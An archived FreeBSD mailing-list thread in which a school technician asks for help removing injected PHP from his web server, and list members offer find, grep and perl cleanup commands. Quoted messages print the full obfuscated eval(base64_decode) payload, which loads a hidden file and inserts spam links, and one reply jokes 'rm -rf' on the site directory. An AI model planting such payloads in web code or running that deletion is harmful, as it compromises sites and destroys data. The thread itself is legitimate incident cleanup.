RE: Mass find/replace...
+ not \; or you will fork on every result. Additionally, is this injected code one long string or broken down by the mailer? Grep isn't the best way to deal with it. It's pretty easy to correct with perl, bit trickier if it's multiline, still not too hard: find /home/horbury -type f -exec \ perl -pi.bak -e 's,\?/\*\*/eval\(base64_decode\(.*?\?,,s' {} + Hi Mel... S'One long singleline string broken down by the mailer... ?php /**/eval(base64_decode([the huge long string originally quoted]));? Have tried doing a find and replace using perl, initially just to replace the string, leaving an empty base64_decode(), however, one of the ICT Teachers has created paths with spaces in, which seemed to throw off the perl I was using... will give yours a try later today *fingers crossed*... If worst comes to worst I can restore from backups, it'll just mean students lose a few days of work that they'd submitted thru Moodle (I've been off for a day or three, and this appears to have happened on the first day of my absence) Ta fer the helpful suggestions thus far! Marc A Coyles - Horbury School ICT Support Team Mbl: 07850 518106 Land: 01924 282740 ext 730 Helpdesk: 01924 282740 ext 2000 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
RE: Mass find/replace...
+ not \; or you will fork on every result. Additionally, is this injected code one long string or broken down by the mailer? Grep isn't the best way to deal with it. It's pretty easy to correct with perl, bit trickier if it's multiline, still not too hard: find /home/horbury -type f -exec \ perl -pi.bak -e 's,\? /\*\*/eval\(base64_decode\(.*?\?,,s' {} + Sadly that didn't work. It created .bak files for everything within /home/Horbury recursively, but didn't make any changes - the base64_decode is till present. Additional point to note: this only needs performing on .php files, not all files... Would I be correct in guessing it's because the string for perl to search for omits a space? IE: within the files, it's as follows: ?php /**/eval(base64_decode('thestring')); ? Whereas the perl appears to be looking for: ?php/**/eval(base64_decode(*wildcard*? Also... how to delete all files ending in .bak recursively? *grin* I'm presuming it'd be: Find /home/horbury -type f -name *.bak -exec \ Rm *.bak ??? Ta! Marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
Marc Coyles wrote: I'm presuming it'd be: Find /home/horbury -type f -name *.bak -exec \ Rm *.bak find /home/horbury -name *.bak -exec rm {} \; Peter -- http://www.boosten.org ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
On Friday 05 December 2008 10:17:46 Marc Coyles wrote: + not \; or you will fork on every result. Additionally, is this injected code one long string or broken down by the mailer? Grep isn't the best way to deal with it. It's pretty easy to correct with perl, bit trickier if it's multiline, still not too hard: find /home/horbury -type f -exec \ perl -pi.bak -e 's,\? /\*\*/eval\(base64_decode\(.*?\?,,s' {} + Sadly that didn't work. It created .bak files for everything within /home/Horbury recursively, but didn't make any changes - the base64_decode is till present. Additional point to note: this only needs performing on .php files, not all files... Would I be correct in guessing it's because the string for perl to search for omits a space? Nope. IE: within the files, it's as follows: ?php /**/eval(base64_decode('thestring')); ? Cause in your original mail I didn't catch the ?php, but the shorthand open. So it should be: 's,\?php /\*\*/eval\(base64_decode\(.*?\?,,s' Whereas the perl appears to be looking for: ?php/**/eval(base64_decode(*wildcard*? Also... how to delete all files ending in .bak recursively? *grin* I'm presuming it'd be: Find /home/horbury -type f -name *.bak -exec \ find /home/horbury -name '*.bak' -delete -- Mel Problem with today's modular software: they start with the modules and never get to the software part. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Peter Boosten wrote: | Marc Coyles wrote: | I'm presuming it'd be: | | Find /home/horbury -type f -name *.bak -exec \ | Rm *.bak | | | find /home/horbury -name *.bak -exec rm {} \; | find /home/horbury -type f -name '*.bak' -delete 'delete' is a find primitive -- no need to exec any other processes. Cheers, Matthew - -- Dr Matthew J Seaman MA, D.Phil. Flat 3 ~ 7 Priory Courtyard PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate ~ Kent, CT11 9PW, UK -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.9 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEAREDAAYFAkk4+OAACgkQ3jDkPpsZ+VbPwACfUrggUN1yIPqkq3pgCyy6fFzH sncAn2WW0XD9l9NgNtK4T2IiMqoyxY6f =1CX6 -END PGP SIGNATURE- ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
RE: Mass find/replace...
All done n' dusted now - thanks very much for everyone's input...! Have noted everything down in the back of my copy of Absolute FreeBSD 2nd Edition (which has inherited quite a few additional pages since I bought it). Now that that's done, I can start to wander thru logs and find who/how... Cheers! Marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
RE: Mass find/replace...
All done n' dusted now - thanks very much for everyone's input...! Have noted everything down in the back of my copy of Absolute FreeBSD 2nd Edition (which has inherited quite a few additional pages since I bought it). Now that that's done, I can start to wander thru logs and find who/how... Cheers! Marc Arse - I spoke too soon. Anyone know any perl to remove blank lines???! It's left a blank line at top of each PHP file that it performed the action on, which has broken things a touch... marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
On Friday 05 December 2008 11:19:09 Marc Coyles wrote: All done n' dusted now - thanks very much for everyone's input...! Have noted everything down in the back of my copy of Absolute FreeBSD 2nd Edition (which has inherited quite a few additional pages since I bought it). Now that that's done, I can start to wander thru logs and find who/how... Cheers! Marc Arse - I spoke too soon. Anyone know any perl to remove blank lines???! It's left a blank line at top of each PHP file that it performed the action on, which has broken things a touch... 's/^(.*?)\r?\n\r?\n/$1\n/s' should only replace the first empty line it finds in a file and accounts for windows line endings. Try it out on one file first: perl -pi.bak 's/^(.*?)\r?\n\r?\n/$1\n/s' filename.php -- Mel Problem with today's modular software: they start with the modules and never get to the software part. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
RE: Mass find/replace...
Arse - I spoke too soon. Anyone know any perl to remove blank lines???! i don't know perl but grep -v ^$ will remove all empty lines ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
Marc Coyles wrote: Never had to do this so not sure where to start. Have googled and found some solutions but they don't particularly work (see below)... Someone has managed to inject php code into a PILE of php pages on my webserver... ? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1 YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5 MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2 OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4 ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2 QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4 NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2 NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0 dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6 ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0 Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp O319fQ==')); ? This basically brings up a pile of spam links. I need to do a find / replace throughout the entire of the /home/horbury/public_html directory... I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' to get a list of the files that require the operation performing, but it comes up with an error (xargs: unterminated quote) after a few results... try using find /home/Horbury/ -type f -print0| xargs -0 grep -l base64_decode (not certain it'll fix it but good practice anyway) Vince Any tips? Basically to find the above and remove it... otherwise I'll have to resort to doing it in Dreamweaver and reuploading, which is a major pita, or restoring from a backup (after working out when exactly this happened and how - I'm guessing thru a teacher's out of date wordpress install somewhere). Marc A Coyles - Horbury School ICT Support Team Mbl: 07850 518106 Land: 01924 282740 ext 730 Helpdesk: 01924 282740 ext 2000 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
the following should work : $ find /home/horbury -type f -print0 | xargs -0 grep 'base64_decode' or : $ find /home/horbury -type f -exec grep 'base64_decode' {} \; On Thu, 2008-12-04 at 12:14 +, Marc Coyles wrote: Never had to do this so not sure where to start. Have googled and found some solutions but they don't particularly work (see below)... Someone has managed to inject php code into a PILE of php pages on my webserver... ? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1 YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5 MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2 OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4 ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2 QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4 NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2 NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0 dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6 ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0 Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp O319fQ==')); ? This basically brings up a pile of spam links. I need to do a find / replace throughout the entire of the /home/horbury/public_html directory... I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' to get a list of the files that require the operation performing, but it comes up with an error (xargs: unterminated quote) after a few results... Any tips? Basically to find the above and remove it... otherwise I'll have to resort to doing it in Dreamweaver and reuploading, which is a major pita, or restoring from a backup (after working out when exactly this happened and how - I'm guessing thru a teacher's out of date wordpress install somewhere). Marc A Coyles - Horbury School ICT Support Team Mbl: 07850 518106 Land: 01924 282740 ext 730 Helpdesk: 01924 282740 ext 2000 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] -- Julien Cigar Belgian Biodiversity Platform http://www.biodiversity.be Université Libre de Bruxelles (ULB) Campus de la Plaine CP 257 Bâtiment NO, Bureau 4 N4 115C (Niveau 4) Boulevard du Triomphe, entrée ULB 2 B-1050 Bruxelles Mail: [EMAIL PROTECTED] @biobel: http://biobel.biodiversity.be/person/show/471 Tel : 02 650 57 52 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
On Thu, Dec 04, 2008 at 12:52:02PM +, Vincent Hoffman typed: Marc Coyles wrote: I need to do a find / replace throughout the entire of the /home/horbury/public_html directory... I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' to get a list of the files that require the operation performing, but it comes up with an error (xargs: unterminated quote) after a few results... try using find /home/Horbury/ -type f -print0| xargs -0 grep -l base64_decode (not certain it'll fix it but good practice anyway) Or just: grep -r base64_decode /home/Horbury Ruben ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
Or just: grep -r base64_decode /home/Horbury rm -rf /home/Horbury and then - write the webpage code properly :) ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Mass find/replace...
On Thursday 04 December 2008 13:58:20 Julien Cigar wrote: the following should work : $ find /home/horbury -type f -print0 | xargs -0 grep 'base64_decode' or : $ find /home/horbury -type f -exec grep 'base64_decode' {} \; + not \; or you will fork on every result. Additionally, is this injected code one long string or broken down by the mailer? Grep isn't the best way to deal with it. It's pretty easy to correct with perl, bit trickier if it's multiline, still not too hard: find /home/horbury -type f -exec \ perl -pi.bak -e 's,\?/\*\*/eval\(base64_decode\(.*?\?,,s' {} + The originals will end up as filename.php.bak. -- Mel Problem with today's modular software: they start with the modules and never get to the software part. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]